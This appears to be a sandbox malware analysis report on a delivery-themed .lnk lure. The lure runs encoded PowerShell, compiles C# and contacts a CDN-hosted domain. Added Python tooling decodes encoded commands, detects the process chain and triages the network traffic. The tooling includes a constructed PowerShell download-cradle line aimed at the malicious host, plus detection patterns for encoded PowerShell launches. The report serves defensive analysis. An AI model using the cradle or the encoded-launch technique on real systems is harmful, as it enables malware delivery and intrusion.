Malware Analysis Report

2025-01-17 21:20

Sample ID: 240603-n6j19afa25
Target: 91b5f15b9b4ca90caf85b7ad83f9b396_JaffaCakes118
SHA256: c74d584e1b980f96d66d6478a42c42c0c31fd0dfebc42bf9e61d93b089de52d2
Tags: (none listed)
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: c74d584e1b980f96d66d6478a42c42c0c31fd0dfebc42bf9e61d93b089de52d2

Threat Level: Known bad

The file 91b5f15b9b4ca90caf85b7ad83f9b396_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary


Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-03 12:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-03 12:00
Reported: 2024-06-03 12:03
Platform: win7-20240220-en
Max time kernel: 120s
Max time network: 121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

Signatures

Blocklisted process makes network request

Description   Indicator   Process                                                     Target
N/A           N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A
N/A           N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description   Indicator   Process                                                     Target
N/A           N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A
N/A           N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A

Suspicious use of AdjustPrivilegeToken

Description               Indicator   Process                                                     Target
Token: SeDebugPrivilege   N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en [base64-encoded command omitted from this page]

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agowh6in.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1594.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1593.tmp"
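The PowerShell process above was started with `-en`, which powershell.exe accepts as an abbreviation of `-EncodedCommand` (any unambiguous prefix of a parameter name is accepted, so `-e`, `-ec`, `-en` and `-enc` all select it; a detection that only matches the literal string "EncodedCommand" misses this launch). The page does not reproduce the encoded argument, so the decoder below, an added example that is not code from the sandbox or the sample, runs on a constructed payload: its script body is made up and only reuses the host name from the Network section. Decoding the argument is the first step an analyst takes here, because a script that calls `Add-Type` explains the csc.exe and cvtres.exe children and the temporary .cmdline, .0.cs, .dll and .pdb files listed under Files.

```python
"""
Decode the PowerShell -EncodedCommand argument from a process command line.
Added analyst tooling, not code from the sandbox or the sample.  The encoded
payload below is CONSTRUCTED: the report does not reproduce the real one.
"""
import base64
import re
from typing import Optional

PARAM = "encodedcommand"


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def is_encoded_switch(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name, so
    -e, -ec, -en, -enc ... all mean -EncodedCommand; a leading '/' also works."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return PARAM.startswith(token[1:].lower())


def encoded_payload(cmdline: str) -> Optional[str]:
    """Return the base64 argument that follows the encoded-command switch, if any."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-1]):
        if is_encoded_switch(tok):
            return toks[i + 1]
    return None


def decode_encoded_command(b64: str) -> Optional[str]:
    """The payload is UTF-16LE text, base64 encoded; anything else is rejected."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(raw) % 2:
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def encode_command(script: str) -> str:
    """Inverse transform; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


URL_RE = re.compile(r"https?://[^\s'\"`)]+", re.I)


def triage(cmdline: str) -> dict:
    """Decode the encoded script and pull out what an analyst checks first."""
    b64 = encoded_payload(cmdline)
    script = decode_encoded_command(b64) if b64 else None
    if script is None:
        return {"encoded": b64 is not None, "decoded": False}
    return {
        "encoded": True,
        "decoded": True,
        "script": script,
        # Add-Type hands C# source to csc.exe, which is what produces the
        # *.cmdline, *.0.cs, *.dll and cvtres.exe artefacts listed in this report.
        "compiles_csharp": bool(re.search(r"\bAdd-Type\b", script, re.I)),
        "urls": URL_RE.findall(script),
    }


# Constructed sample in the shape of the observed launch; the script body is
# made up and only reuses the host name from the Network section.
SAMPLE_SCRIPT = (
    "Add-Type -TypeDefinition $src; "
    "(New-Object Net.WebClient).DownloadString('https://1361227624.rsc.cdn77.org/')"
)
SAMPLE_CMDLINE = (
    '"C:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -en '
    + encode_command(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

`triage()` returns the decoded script together with the two facts worth checking before reading it in full: whether it compiles C# (which ties the csc.exe child to the script rather than to some unrelated build activity) and which URLs it embeds. On a real command line, take the base64 string verbatim from the process-creation event; the decoder rejects anything that is not valid base64 of UTF-16LE text rather than returning garbage.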

Network

Country   Destination        Domain                     Proto
US        8.8.8.8:53         1361227624.rsc.cdn77.org   udp
GB        89.187.167.5:443   1361227624.rsc.cdn77.org   tcp
GB        89.187.167.5:443   1361227624.rsc.cdn77.org   tcp

Files

memory/2808-38-0x000007FEF5C1E000-0x000007FEF5C1F000-memory.dmp

memory/2808-41-0x0000000002680000-0x0000000002688000-memory.dmp

memory/2808-42-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-43-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-40-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-44-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-39-0x000000001B510000-0x000000001B7F2000-memory.dmp

memory/2808-45-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\agowh6in.cmdline

MD5 dd3ca3afd2053888e49366e486b0c019
SHA1 2415e38683aff17c9df3dcaadde40938e0c974f1
SHA256 122b6e87462f8d871b266c0312737e9ab44d67b97529a364602203403cbd6036
SHA512 1d2bc3efa890282f2b5ae58083f64705e08fdc6bc2cc4cef37eed3ce36c7ebbf30376439fadedd3d019a4bf5a8418af6c7703ce8c2fd821e2c976a6c7d778249

\??\c:\Users\Admin\AppData\Local\Temp\agowh6in.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

C:\Users\Admin\AppData\Local\Temp\agowh6in.pdb

MD5 fe9e2d9c0380066d48d9204dfad05a40
SHA1 55be776084a9a123634f3035a4490ed0516fb25b
SHA256 25434f644594800218e95244e8cbc3cb8a114881fb7e8f2acf5f9bce52525cdc
SHA512 a8cf1e248d4189ca605d4f540610f8646fcc4d4bfdc3f84e5cef77c4732cb9ab8d5d85156b3ff0e454db2fa251ca9d560c67f4b2b275144fce8e6a6729c7e973

memory/2808-59-0x0000000002AF0000-0x0000000002AF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\agowh6in.dll

MD5 fa4f288d7f2f3e7e14b1163dd8cb405f
SHA1 e0158844f61b8080d3fcb579e2fd93b000a6be62
SHA256 2fc9904f574d4a60bd342c520d98e886f9cd9b2c2c66b374855c11a282ef52fd
SHA512 a88cbd2f0636764ae35a947cf2f472c123d3886e492db052b4cb68b5e087ae368000f2b4d895eea4028618c512f0edb6a273b79266537b433ac2ad08fce6e2f1

C:\Users\Admin\AppData\Local\Temp\RES1594.tmp

MD5 f8e6cf91b503bd87acfa3d23c5e97fbe
SHA1 931f606e1509ccea0c2d8009fe2fbb3345f1b52e
SHA256 b1dfd802bdc5d9349df2ae4975af0ba3596a644317aff2f02a0ff8ec6cb7e3bb
SHA512 7f0238ca0c7d448a6bd398b54711f563275cdc82fa8b935b69269d83b085a73f0c5275ab637fe587703293ec5fd4010df2278ef2345a86357e961dc8de9c7c25

\??\c:\Users\Admin\AppData\Local\Temp\CSC1593.tmp

MD5 06b749a48318b88e9fe4a103f2127872
SHA1 557a12be267032c2c60bb2c95c38c6138fd8a5f7
SHA256 5f2dcd93dc03fb60f8f0fe6a5e71be56f7c2fd68fa07f753f609d6c309d1574e
SHA512 9233efd7d4001737cc5b9c079f8892d0b31861b0db4191e6ce4de1141cc15b801f999f7210dae7310c8f1c20d0d2be12ed4d39ea07912db09e73c28ca3443199

memory/2808-62-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-06-03 12:00
Reported: 2024-06-03 12:03
Platform: win10v2004-20240426-en
Max time kernel: 91s
Max time network: 95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

Signatures

Blocklisted process makes network request

Description   Indicator   Process                                                     Target
N/A           N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A
N/A           N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A

Checks computer location settings

Description         Indicator                                                                                           Process                       Target
Key value queried   \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation   C:\Windows\system32\cmd.exe   N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description               Indicator   Process                                                     Target
Token: SeDebugPrivilege   N/A         C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe   N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en [base64-encoded command omitted from this page]

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES441D.tmp" "c:\Users\Admin\AppData\Local\Temp\rxiqelpl\CSCFA32093BCDA5457A8F96A6E654CC4DD.TMP"
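Both detonations show the same four-process chain: cmd.exe launching a .lnk from the user's Temp directory (the shortcut name is Portuguese, "returned merchandise - Correios", the Brazilian postal service, a delivery-themed lure), PowerShell with an encoded command, csc.exe compiling a response file from Temp, and cvtres.exe. csc.exe and cvtres.exe are legitimate .NET build tools, so neither is a useful indicator on its own; what matters is the parent. The detection below is an added example over constructed process-creation events, not the sandbox's own signature logic. Field names (pid, ppid, image, cmdline) are assumed, and only pid 4196 corresponds to a pid visible in this report (the powershell.exe memory dumps); the other pids, and the benign MSBuild control events, are made up.

```python
"""
Detect the process chain reported in both detonations:
cmd.exe (.lnk in Temp) -> powershell.exe (-en ...) -> csc.exe (@*.cmdline) -> cvtres.exe.
Added example over CONSTRUCTED process-creation events, not the sandbox's own
signature logic.  Field names (pid, ppid, image, cmdline) are assumed; only
pid 4196 matches a pid visible in this report (the powershell.exe memory dumps).
"""
import ntpath
import re

LNK_LURE = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.lnk\b", re.I)
# Common spellings of -EncodedCommand; powershell.exe takes any unambiguous prefix.
ENC_SWITCH = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)(?=\s)", re.I)
# Add-Type writes C# source plus a response file and invokes csc.exe exactly like this.
CSC_RESPONSE = re.compile(r"/noconfig\s+/fullpaths\s+@\"?[^\s\"]+\.cmdline", re.I)

CHAIN = ["lnk_launch", "encoded_powershell", "csc_response_compile", "cvtres"]


def stage(ev):
    """Map one event onto a chain stage, or None if it matches nothing."""
    img, cmd = ntpath.basename(ev["image"]).lower(), ev["cmdline"]
    if img == "cmd.exe" and LNK_LURE.search(cmd):
        return "lnk_launch"
    if img == "powershell.exe" and ENC_SWITCH.search(cmd):
        return "encoded_powershell"
    if img == "csc.exe" and CSC_RESPONSE.search(cmd):
        return "csc_response_compile"
    if img == "cvtres.exe":
        return "cvtres"
    return None


def find_chains(events):
    """Walk from every cvtres.exe up its ancestry; return pid paths matching CHAIN in full."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        if stage(ev) != CHAIN[-1]:
            continue
        path, cur = [], ev
        for want in reversed(CHAIN):
            if cur is None or stage(cur) != want:
                break
            path.append(cur["pid"])
            cur = by_pid.get(cur["ppid"])
        else:
            hits.append(path[::-1])
    return hits


def csc_from_encoded_powershell(events):
    """Narrower rule that fires without the .lnk and cvtres.exe context:
    csc.exe whose direct parent is PowerShell running an encoded command."""
    by_pid = {e["pid"]: e for e in events}
    return [e["pid"] for e in events
            if stage(e) == "csc_response_compile"
            and e["ppid"] in by_pid
            and stage(by_pid[e["ppid"]]) == "encoded_powershell"]


# Constructed events. Command lines of 1100/4196/4300/4310 follow the report;
# pids other than 4196 and the MSBuild control (5000-5002) are made up.
EVENTS = [
    {"pid": 1000, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk"},
    {"pid": 4196, "ppid": 1100, "image": r"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # base64 of UTF-16LE "Add-Type", standing in for the real encoded argument
     "cmdline": r'"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en QQBkAGQALQBUAHkAcABlAA=='},
    {"pid": 4300, "ppid": 4196, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.cmdline"'},
    {"pid": 4310, "ppid": 4300, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES441D.tmp" "c:\Users\Admin\AppData\Local\Temp\rxiqelpl\CSCFA32093BCDA5457A8F96A6E654CC4DD.TMP"'},
    # Benign control: a build also runs csc.exe -> cvtres.exe, but under MSBuild,
    # so the ancestry never reaches an encoded PowerShell or a .lnk launch.
    {"pid": 5000, "ppid": 1000, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe app.csproj"},
    {"pid": 5001, "ppid": 5000, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\proj\obj\build.cmdline"'},
    {"pid": 5002, "ppid": 5001, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmdline": "cvtres.exe /NOLOGO"},
]

if __name__ == "__main__":
    print(find_chains(EVENTS), csc_from_encoded_powershell(EVENTS))
```

`find_chains()` requires every link of the chain and so stays quiet on the MSBuild control; `csc_from_encoded_powershell()` is the rule to deploy when the .lnk parent is not visible (for example when the shortcut is opened directly from a mail client rather than through cmd.exe), since csc.exe spawned by PowerShell with an encoded command is rare in normal use.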

Network

Country   Destination        Domain                          Proto
US        8.8.8.8:53         232.168.11.51.in-addr.arpa      udp
US        8.8.8.8:53         1361227624.rsc.cdn77.org        udp
US        8.8.8.8:53         172.210.232.199.in-addr.arpa    udp
GB        89.187.167.8:443   1361227624.rsc.cdn77.org        tcp
GB        89.187.167.8:443   1361227624.rsc.cdn77.org        tcp
US        8.8.8.8:53         8.167.187.89.in-addr.arpa       udp
US        8.8.8.8:53         68.32.126.40.in-addr.arpa       udp
US        8.8.8.8:53         95.221.229.192.in-addr.arpa     udp
US        8.8.8.8:53         13.86.106.20.in-addr.arpa       udp
US        8.8.8.8:53         103.169.127.40.in-addr.arpa     udp
US        8.8.8.8:53         18.31.95.13.in-addr.arpa        udp
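The Windows 10 run's network table mixes the sample's own activity with resolver traffic: one forward lookup and two TLS connections to 1361227624.rsc.cdn77.org, plus a series of PTR (in-addr.arpa) queries. Only one of those PTR names reverses to an address the sample actually connected to (8.167.187.89.in-addr.arpa is 89.187.167.8); the rest reverse to addresses that appear nowhere else in the table. Note also that the two detonations resolved the same host to different CDN edge addresses (89.187.167.5 in the Windows 7 run, 89.187.167.8 here), so the domain is the stable indicator and the IPs are not. The script below is an added analyst example, not code from the sandbox; ROWS copies the table above, and the rule that a PTR lookup for a never-contacted address is OS or sandbox background noise rather than sample behaviour is an analyst assumption, not something the report states.

```python
"""
Separate the sample's own network activity from resolver noise in a sandbox
network table.  Added analyst tooling, not the sandbox's own code.  ROWS copies
the rows of the behavioral2 Network table; the classification rule (a PTR lookup
for an address the sample never connected to is background noise) is an analyst
ASSUMPTION, not something the report states.
"""
import ipaddress
from typing import Optional

ROWS = """\
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 1361227624.rsc.cdn77.org udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 89.187.167.8:443 1361227624.rsc.cdn77.org tcp
GB 89.187.167.8:443 1361227624.rsc.cdn77.org tcp
US 8.8.8.8:53 8.167.187.89.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
""".splitlines()


def parse_rows(lines):
    """Each row: country, ip:port, domain, proto (the report's column order)."""
    rows = []
    for line in lines:
        country, dest, domain, proto = line.split()
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name: str) -> Optional[str]:
    """'8.167.187.89.in-addr.arpa' -> '89.187.167.8'; None if not an IPv4 PTR name."""
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def summarize(rows):
    """Split DNS lookups from real connections and derive the indicator set."""
    contacted = {}  # ip -> {"domain": ..., "ports": set()}
    resolved, ptr_lookups = set(), set()
    for r in rows:
        if r["port"] == 53:  # resolver traffic: a query, not a connection
            ip = ptr_to_ip(r["domain"])
            if ip:
                ptr_lookups.add(ip)
            else:
                resolved.add(r["domain"])
        else:
            entry = contacted.setdefault(r["ip"], {"domain": r["domain"], "ports": set()})
            entry["ports"].add(r["port"])
    contacted_ips = set(contacted)
    return {
        "contacted": contacted,
        "resolved": resolved,
        # PTR lookups for hosts that were actually contacted belong to the
        # sample's session; the rest is assumed to be OS or sandbox background.
        "ptr_contacted": sorted(ptr_lookups & contacted_ips),
        "ptr_uncontacted": sorted(ptr_lookups - contacted_ips),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_rows(ROWS)).items():
        print(key, value)
```

Feed the output's `resolved` set and `contacted` map into the indicator list, and treat `ptr_uncontacted` as a list to explain rather than to block: if a later run shows one of those addresses being contacted, the PTR lookup stops being noise.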

Files

memory/4196-2-0x00007FFD60983000-0x00007FFD60985000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zezupish.kny.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4196-12-0x000001887B770000-0x000001887B792000-memory.dmp

memory/4196-13-0x00007FFD60980000-0x00007FFD61441000-memory.dmp

memory/4196-14-0x00007FFD60980000-0x00007FFD61441000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

\??\c:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.cmdline

MD5 b13936f927e1044e6fbcfae343fb55eb
SHA1 1772c6ab3ae7797e3db26377e0481af84817efa8
SHA256 654fb4421435548594bbfa6efa730ad4d02d9044297f2fe2e6df5f57e3bf9c30
SHA512 1eb3af8b657deb7d43b657ce3a963ba272d7789e2f09e1c3c1a9ac97874da369bd0106719d1744d79acb356c1721fd7920504010b40c2eaf98f0cc1b08d3eb7a

\??\c:\Users\Admin\AppData\Local\Temp\rxiqelpl\CSCFA32093BCDA5457A8F96A6E654CC4DD.TMP

MD5 a764751e67b4933e8bfa8cf660ec502a
SHA1 b52b846b0c1ce2d1a0d60c0204c43d50838f0a5f
SHA256 5b380f4c658006d672b43031fe31dece71b4c1e3c3bd3496a69ee4d0b6afe2bc
SHA512 ea0a1467e0023e7f7fbd6dad801b2b8242122cfdf4642c81871e74a8588c26d263036fb778e78c51bc6814d451d895f12583c83a471e214eb8a63928335c28b1

C:\Users\Admin\AppData\Local\Temp\RES441D.tmp

MD5 7e5f8cdf1324510f437f6461b8010bf1
SHA1 33d6765989cbbf97b7f3d301682e66f5e0d4ab7a
SHA256 2706269ca0ab90bcb74a8d4835c15ca3b06c1043db8dee5b7defc346e16e2963
SHA512 815b34a68398fcc9362f791282334f01470a1a0f11c3703fc7eba7e9b33a629dc57957fdeb61c156021006a59e0a165b78ff013220885c374b1ef0bdfc90d6ed

C:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.dll

MD5 b56d5aa15b56741250e165d33432c9f2
SHA1 9e5d7f53ec98180eb82a953615f0bf07565c15de
SHA256 e29f26e8cc27ebcb82fcc3915cc148c71b9914ce88da803dba46a07f2e66d1ab
SHA512 496e57b2cb18bcf4eddf62b7aa27032da6735273384d0eb94738ff63d9ac3c8eb173a80e0c903074dd9fd9fa027ebeb0ab7e93ff6c0c9616672a4a3b83e01c32

memory/4196-27-0x0000018879570000-0x0000018879578000-memory.dmp

memory/4196-31-0x00007FFD60980000-0x00007FFD61441000-memory.dmp